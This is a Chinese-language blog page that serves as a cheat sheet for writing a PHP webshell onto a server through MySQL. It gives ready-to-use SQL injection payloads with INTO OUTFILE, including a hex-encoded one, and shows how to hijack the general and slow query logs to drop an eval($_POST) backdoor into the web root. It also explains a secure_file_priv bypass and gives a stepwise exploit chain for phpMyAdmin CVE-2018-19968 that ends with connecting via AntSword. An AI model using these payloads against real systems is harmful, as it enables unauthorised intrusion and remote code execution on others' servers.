<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>
        Hexo
    </title>
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-reply replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            MySQL写Shell
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="通过outfile写入shell（配合union-select"><a href="#通过outfile写入shell（配合union-select" class="headerlink" title="通过outfile写入shell（配合union select"></a>通过outfile写入shell（配合union select</h1><p>利用条件：</p>
<p>1.root权限</p>
<p>2.知道网站绝对路径且具有写入权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">select &#x27;&lt;?php  @eval($_POST[1]);?&gt;&#x27; into outfile &#x27;E:/phpStudy2018/PHPTutorial/WWW/shell.php&#x27;</span><br><span class="line"></span><br><span class="line">?id=1 union select 1,&quot;&lt;?php @eval($_POST[&#x27;g&#x27;]);?&gt;&quot;,3 into outfile &#x27;E:/study/WWW/evil.php&#x27;</span><br><span class="line">?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile &quot;E:/study/WWW/evil.php&quot;</span><br></pre></td></tr></table></figure>

<h1 id="将shell写入表中"><a href="#将shell写入表中" class="headerlink" title="将shell写入表中"></a>将shell写入表中</h1><p>利用条件：</p>
<p>1.root权限</p>
<p>2.知道网站绝对路径且具有写入权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">-- 将shell插入一个表中</span><br><span class="line">insert into `sxss`(`comment`) values (&#x27;&lt;?php  @eval($_POST[1]);?&gt;&#x27;);</span><br><span class="line">-- 查询该数据表，将结果导出文件</span><br><span class="line">select comment from sxss into outfile &#x27;E:/phpStudy2018/PHPTutorial/WWW/shell.php&#x27;;</span><br></pre></td></tr></table></figure>

<h1 id="开启全局日志写入shell"><a href="#开启全局日志写入shell" class="headerlink" title="开启全局日志写入shell"></a>开启全局日志写入shell</h1><p>利用条件：</p>
<p>1.root权限</p>
<p>2.知道网站绝对路径且具有写入权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">-- 查看全局日志配置</span><br><span class="line">show variables like &#x27;%general%&#x27;;</span><br><span class="line"></span><br><span class="line">-- 开启全局配置</span><br><span class="line">set global general_log = on;</span><br><span class="line"></span><br><span class="line">-- 将日志文件设置成服务器下的木马文件</span><br><span class="line">set global general_log_file = &#x27;E:/phpStudy2018/PHPTutorial/WWW/shell.php&#x27;;</span><br><span class="line"></span><br><span class="line">-- 然后执行sql语句，mysql会将我没执行的语句记录到日志文件(上一步修改后的文件)中</span><br><span class="line">select &#x27;&lt;?php  @eval($_POST[1]);?&gt;&#x27;;</span><br></pre></td></tr></table></figure>

<h1 id="慢查询日志写入shell"><a href="#慢查询日志写入shell" class="headerlink" title="慢查询日志写入shell"></a>慢查询日志写入shell</h1><p>在实际写webshell的时候，我们经常会遭受到secure_file_priv的阻拦，secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用，其参数值有以下三种：</p>
<p>1、NULL：表示不允许导入导出</p>
<p>2、目录地址，如&#x2F;tmp&#x2F;：表示只能对指定目录进行导入导出，如&#x2F;tmp&#x2F;</p>
<p>3、空，即没有具体值：表示不对导入导出做限制</p>
<p>可使用如下命令来查看secure_file_priv的值：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#x27;%secure%&#x27;;</span><br></pre></td></tr></table></figure>

<p>高版本的mysql中默认为NULL，也就是不让导入导出</p>
<p>解决办法：</p>
<p>在Windows下可在my.ini的[mysqld]里面，添加secure_file_priv&#x3D;</p>
<p>在linux下可在&#x2F;etc&#x2F;my.cnf的[mysqld]里面，添加secure_file_priv&#x3D;</p>
<p>使用慢查询日志绕过此限制</p>
<p>利用条件：</p>
<p>1.root权限</p>
<p>2.知道网站绝对路径且具有写入权限</p>
<p>执行如下语句写入shell：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">-- 查看慢查询日志开启情况</span><br><span class="line">show variables like &#x27;%slow_query_log%&#x27;;</span><br><span class="line"></span><br><span class="line">-- 开启慢查询日志</span><br><span class="line">set global slow_query_log=1;</span><br><span class="line"></span><br><span class="line">-- 修改日志文件存储的绝对路径</span><br><span class="line">set global slow_query_log_file=&#x27;E:/phpStudy2018/PHPTutorial/WWW/shell.php&#x27;;</span><br><span class="line"></span><br><span class="line">-- 向日志文件中写入</span><br><span class="line">shellselect &#x27;&lt;?php @eval($_POST[1]);?&gt;&#x27; or sleep(11);</span><br></pre></td></tr></table></figure>

<p>使用慢查询日志时，只有当查询时间超过系统时间(默认为10秒)时才会记录在日志中，使用如下语句可查看系统时间：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#x27;%long_query_time%&#x27;;</span><br></pre></td></tr></table></figure>

<h1 id="CVE-2018-19968文件包含"><a href="#CVE-2018-19968文件包含" class="headerlink" title="CVE-2018-19968文件包含"></a>CVE-2018-19968文件包含</h1><p>受影响的phpMyAdmin版本：</p>
<p>4.8.0 ~ 4.8.3</p>
<p>首先登录管理后台</p>
<p>执行如下语句创建数据库，并将shell写入数据表：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">CREATE DATABASE foo;</span><br><span class="line">CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );</span><br><span class="line">INSERT INTO foo.bar SELECT &quot;&lt;?php  file_put_contents(&#x27;shell.php&#x27;,&#x27;&lt;?php @eval($_POST[1]);?&gt;&#x27;);?&gt;&quot;;</span><br></pre></td></tr></table></figure>

<p>然后访问<a target="_blank" rel="noopener" href="http://target/chk_rel.php?fixall_pmadb=1&db=foo">http://target/chk_rel.php?fixall_pmadb=1&amp;db=foo</a></p>
<p>来到foo数据库，执行如下语句：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO pma__column_info SELECT &#x27;1&#x27;, &#x27;foo&#x27;, &#x27;bar&#x27;, &#x27;baz&#x27;, &#x27;plop&#x27;, &#x27;plop&#x27;, &#x27;plop&#x27;, &#x27;plop&#x27;, &#x27;../../../../../../../../tmp/sess_***&#x27;,&#x27;plop&#x27;;</span><br></pre></td></tr></table></figure>

<p>将sess_***中的 * * *替换成cookie中phpMyAdmin对应的值</p>
<p>访问：<a target="_blank" rel="noopener" href="http://target/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name%5Bmulti_edit%5D(#)[]=baz&clause_is_unique=1">http://target/tbl_replace.php?db=foo&amp;table=bar&amp;where_clause=1=1&amp;fields_name[multi_edit](#)[]=baz&amp;clause_is_unique=1</a></p>
<p>访问这条连接后将会在网站根目录下生成一个shell.php的webshell，使用蚁剑进行连接</p>
<h1 id="利用分隔符写入"><a href="#利用分隔符写入" class="headerlink" title="利用分隔符写入"></a>利用分隔符写入</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?id=1 INTO OUTFILE &#x27;物理路径&#x27; lines terminated by  （一句话hex编码）#</span><br><span class="line">?id=1 INTO OUTFILE &#x27;物理路径&#x27; fields terminated by （一句话hex编码）#</span><br><span class="line">?id=1 INTO OUTFILE &#x27;物理路径&#x27; columns terminated by （一句话hex编码）#</span><br><span class="line">?id=1 INTO OUTFILE &#x27;物理路径&#x27; lines starting by    （一句话hex编码）#</span><br></pre></td></tr></table></figure>

    </div>

    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>
    <div class="footer" id="footer">
    <p>Copyright © 2020 <a class="flink" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>-<a class="flink" target="_blank" rel="noopener" href="https://github.com/sanjinhub/hexo-theme-geek">Geek</a>.
        <label class="el-switch el-switch-green el-switch-sm" style="vertical-align: sub;">
            <input type="checkbox" name="switch" id="update_style">
            <span class="el-switch-style"></span>
        </label>
<!--         <script type="text/javascript">
        var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
        document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
        </script> -->
    </p>
</div>
<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="CmCti21ooOOIzFOhEyFkFvR0-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="FqiyUqbg7McKN2eG0MCewupf">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
    color: #698fca;
}

.v .vlist .vcard .vhead .vsys {
    color: #3a3e4a;
}

.v .vlist .vcard .vh .vmeta .vat {
    color: #638fd5;
}

.v .vlist .vcard .vhead .vnick {
    color: #6ba1ff;
}

.v a {
    color: #8696b1;
}

.v .vlist .vcard .vhead .vnick:hover {
    color: #669bfc;
}
</style>
</body>

</html>